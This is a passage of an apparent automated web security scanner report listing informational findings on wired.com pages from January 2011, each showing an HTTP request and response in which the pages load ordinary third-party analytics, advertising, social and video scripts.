<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.20. http://www.wired.com/blogs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /blogs/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blogs/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=240
Expires: Wed, 12 Jan 2011 15:42:28 GMT
Date: Wed, 12 Jan 2011 15:38:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang
...[SNIP]...
<!-- close shell div -->
       
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
       </script>
...[SNIP]...

6.21. http://www.wired.com/cars/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /cars/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cars/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=21
Expires: Wed, 12 Jan 2011 15:36:13 GMT
Date: Wed, 12 Jan 2011 15:35:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- Underwire Xrail Brightcove Player zindex fixed --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.22. http://www.wired.com/culture/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /culture/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=71
Expires: Wed, 12 Jan 2011 15:37:05 GMT
Date: Wed, 12 Jan 2011 15:35:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70010


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- Underwire Xrail Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.23. http://www.wired.com/dangerroom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /dangerroom/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dangerroom/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/dangerroom/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:38:00 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=420
Expires: Wed, 12 Jan 2011 15:45:49 GMT
Date: Wed, 12 Jan 2011 15:38:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.24. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 09:44:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=427
Expires: Wed, 12 Jan 2011 15:46:00 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.25. http://www.wired.com/entertainment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=21
Expires: Wed, 12 Jan 2011 15:36:37 GMT
Date: Wed, 12 Jan 2011 15:36:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- Underwire Xrail Brightcove Player zindex fixed --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.26. http://www.wired.com/epicenter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /epicenter/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /epicenter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:48:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=469
Expires: Wed, 12 Jan 2011 15:46:57 GMT
Date: Wed, 12 Jan 2011 15:39:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://widget.networkedblogs.com/getwidget?bid=204567"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.27. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:02:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:15 GMT
Date: Wed, 12 Jan 2011 15:39:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://widget.networkedblogs.com/getwidget?bid=204567"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.28. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /epicenter/2011/01/metropcs-net-neutrality/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /epicenter/2011/01/metropcs-net-neutrality/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:04:29 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:47:01 GMT
Date: Wed, 12 Jan 2011 15:39:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://widget.networkedblogs.com/getwidget?bid=204567"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.29. http://www.wired.com/gadgetlab/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /gadgetlab/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gadgetlab/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:39:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:23 GMT
Date: Wed, 12 Jan 2011 15:39:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- /all in one seo pack -->
<script type="text/javascript" src="http://wiredgadgetlab.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+39803771688e6b83ac1453e6e9bbbb1e4a5a5d15+1294846745"></script>
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<!-- GadgetLab Xrail Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.30. http://www.wired.com/gadgets/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /gadgets/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gadgets/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=89
Expires: Wed, 12 Jan 2011 15:37:45 GMT
Date: Wed, 12 Jan 2011 15:36:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.31. http://www.wired.com/gamelife/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /gamelife/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gamelife/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:43:51 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:42 GMT
Date: Wed, 12 Jan 2011 15:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<!-- Game Life Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Game Life Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- start brightcove --><script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Gamelife Xrail Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.32. http://www.wired.com/gaming/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /gaming/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gaming/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=114
Expires: Wed, 12 Jan 2011 15:38:18 GMT
Date: Wed, 12 Jan 2011 15:36:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69956


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!-- Underwire Xrail Brightcove Player zindex fixed --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.33. http://www.wired.com/geekdad/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /geekdad/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /geekdad/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:32:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=66
Expires: Wed, 12 Jan 2011 15:40:53 GMT
Date: Wed, 12 Jan 2011 15:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<span class="zem-script more-related pretty-attribution"><script src="http://static.zemanta.com/readside/loader.js" type="text/javascript"></script>
...[SNIP]...
